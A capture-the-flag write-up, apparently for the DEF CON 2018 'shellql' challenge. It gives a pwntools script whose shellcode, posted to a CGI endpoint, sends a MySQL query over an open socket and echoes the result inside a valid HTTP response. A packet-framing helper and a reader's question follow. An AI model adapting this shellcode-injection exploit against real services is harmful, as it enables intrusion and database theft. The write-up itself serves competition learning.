```python
#!/usr/bin/env python2
from pwn import *
import requests

"""
* will execute our shellcode
* only read/write due to prctl(PR_SET_SECCOMP, SECCOMP_MODE_STRICT)
* have to return valid HTTP response otherwise will get 500
* can query the db using fd 4
"""

context.arch = "amd64"
context.os = "linux"

host = "http://b9d6d408.quals2018.oooverflow.io/cgi-bin/"
html = """X-Powered-By: PHP/7.0.28-0ubuntu0.16.04.1\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n<html><body>Hello World!</body></html>"""

query = "SELECT * from flag;"

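shellcode = ""
# write a MySQL COM_QUERY (0x03) packet to the already-open db socket on fd 4
shellcode += shellcraft.echo(p16(len(query)) + "\x00\x00\x03" + query, 4)
# read the server's reply from fd 4 onto the stack
shellcode += shellcraft.read(4, 'rsp', 200)
# push the HTTP headers and body just below the reply so the CGI output is valid
shellcode += shellcraft.pushstr(html)
# write 500 bytes from rsp to stdout: the pushed response followed by the db reply
shellcode += shellcraft.write(1, 'rsp', 500)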

data = {
"shell": asm(shellcode) + "\x00"
}

resp = requests.post(host + "index.php", data=data)
print resp.text

```

--vakzz

Original writeup (https://devcraft.io/2018/05/21/shellql-def-con-ctf-qualifier-2018.html).
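
The bytes written to fd 4 follow the MySQL client packet framing: a 3-byte little-endian payload length, a 1-byte sequence id, then the payload, whose first byte is the command (0x03, COM_QUERY). The block below is an added example, not part of the original writeup: a Python 3 framing helper and parser that decodes the same header; `frame_query`, `parse_packet` and `script_bytes` are names chosen here.

```python
import struct

COM_QUERY = 0x03  # MySQL command byte for a text query


def frame_query(sql: bytes, seq: int = 0) -> bytes:
    """Frame a COM_QUERY: 3-byte LE payload length, 1-byte sequence id, payload."""
    payload = bytes([COM_QUERY]) + sql
    return len(payload).to_bytes(3, "little") + bytes([seq]) + payload


def parse_packet(buf: bytes):
    """Split the first packet off buf -> (seq, command, body, leftover)."""
    if len(buf) < 4:
        raise ValueError("short header")
    length = int.from_bytes(buf[:3], "little")
    payload = buf[4:4 + length]
    if length == 0 or len(payload) < length:
        raise ValueError("empty or truncated payload")
    return buf[3], payload[0], payload[1:], buf[4 + length:]


def script_bytes(sql: bytes) -> bytes:
    """The header arithmetic used in the script above, redone on Python 3 bytes."""
    return struct.pack("<H", len(sql)) + b"\x00\x00\x03" + sql


if __name__ == "__main__":
    q = b"SELECT * from flag;"
    for name, raw in (("script", script_bytes(q)), ("framed", frame_query(q))):
        seq, cmd, body, rest = parse_packet(raw)
        print(name, seq, hex(cmd), body, rest)
```

The script's length field counts only the SQL text, not the command byte, so the packet the server sees ends just before the trailing `;`, which is harmless for this query.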

dirty_vish, May 15, 2018, 2:29 p.m.

Why do you use "shellcraft.pushstr" instead of "shellcraft.echo" for the html string so you can echo it out to STDOUT?